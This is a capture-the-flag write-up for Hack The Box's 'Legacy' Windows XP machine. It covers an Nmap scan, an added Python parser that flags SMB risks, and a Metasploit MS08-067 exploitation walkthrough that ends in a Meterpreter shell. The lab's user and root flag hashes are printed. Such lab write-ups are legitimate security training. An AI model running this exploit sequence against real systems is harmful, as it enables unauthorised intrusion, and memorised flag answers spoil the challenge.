Legacy is a retired Windows machine that is rated as Easy on Hack the Box.
Let’s get started
As always, hacking starts with an Nmap scan.
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: unknown, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
| smb-security-mode:
| account_used: blank
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
As we can see, it is a Windows XP machine, which can be exploited in many ways. The easy way is to use Metasploit and take down the machine.
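The scan output above already contains the findings a defender would want to act on before anyone reaches for an exploit: an end-of-life operating system, SMB message signing disabled, and an SMB service that answered a blank (null) account during enumeration. The following Python script is an added example, not part of the original write-up and not Nmap or Hack The Box tooling; it parses the port table and host-script section of a scan like the one above (a constructed copy of that output is embedded as SAMPLE_SCAN) and lists those findings. The END_OF_LIFE_OS list and the risk wording are my assumptions.

```python
"""Added example: pull the defensively relevant facts out of an Nmap report.

The parser handles the plain-text layout Nmap prints for the port table and
for host scripts such as smb-os-discovery and smb-security-mode.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample: a trimmed copy of the scan output shown in the write-up.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| smb-security-mode:
| account_used: blank
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
"""

# Assumption: illustrative list of Windows versions that no longer receive
# security updates, matched against the OS string smb-os-discovery reports.
END_OF_LIFE_OS = ("Windows 2000", "Windows XP", "Windows Server 2003")

# Host-script lines start with "|" or "|_" followed by optional whitespace.
SCRIPT_LINE = re.compile(r"^\|_?\s*(.*)$")
# Port-table lines look like "445/tcp open microsoft-ds ...".
PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
SMB_SERVICES = ("netbios-ssn", "microsoft-ds")


@dataclass
class SmbFinding:
    host: str
    os_name: str = "unknown"
    open_smb_ports: List[int] = field(default_factory=list)
    message_signing: str = "unknown"
    account_used: str = "unknown"

    def risks(self) -> List[str]:
        """Return human-readable findings, most severe first."""
        out = []
        if any(eol in self.os_name for eol in END_OF_LIFE_OS):
            out.append(f"end-of-life OS exposed on the network: {self.os_name}")
        if self.message_signing.startswith("disabled"):
            out.append("SMB message signing disabled (relay/tampering exposure)")
        if self.account_used == "blank" and self.open_smb_ports:
            out.append("SMB accepted a null session (unauthenticated enumeration)")
        return out


def parse_nmap_smb(text: str) -> SmbFinding:
    """Parse one host's Nmap report into an SmbFinding."""
    finding = SmbFinding(host="unknown")
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            finding.host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m and m.group(2) in SMB_SERVICES:
            finding.open_smb_ports.append(int(m.group(1)))
            continue
        m = SCRIPT_LINE.match(line)
        if not m or ":" not in m.group(1):
            continue
        key, _, value = m.group(1).partition(":")
        key, value = key.strip(), value.strip()
        if key == "OS":
            finding.os_name = value
        elif key == "message_signing":
            finding.message_signing = value
        elif key == "account_used":
            finding.account_used = value
    return finding


if __name__ == "__main__":
    result = parse_nmap_smb(SAMPLE_SCAN)
    print(f"{result.host}: SMB on {result.open_smb_ports}, OS {result.os_name}")
    for risk in result.risks():
        print(" -", risk)
```

Run it as-is to see the report for the embedded sample, or pass the text of a real `nmap -sV -sC` report to `parse_nmap_smb`. The ordering of the findings is deliberate: the signing flag is the one Nmap labels "dangerous", but the unsupported operating system is what makes the MS08-067 exploit used in this write-up possible, so it is the finding that warrants isolating or decommissioning the host.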
metasploit
msfconsole
msf5 > search netapi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
1 exploit/windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
2 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
3 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
lhost => tun0
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
After the exploit completes successfully, we get a Meterpreter shell.
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
Getting User.txt
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:19:32 -0400 user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
Getting Root.txt
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:18:19 -0400 root.txt
meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
Getting both flags is just that easy.
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968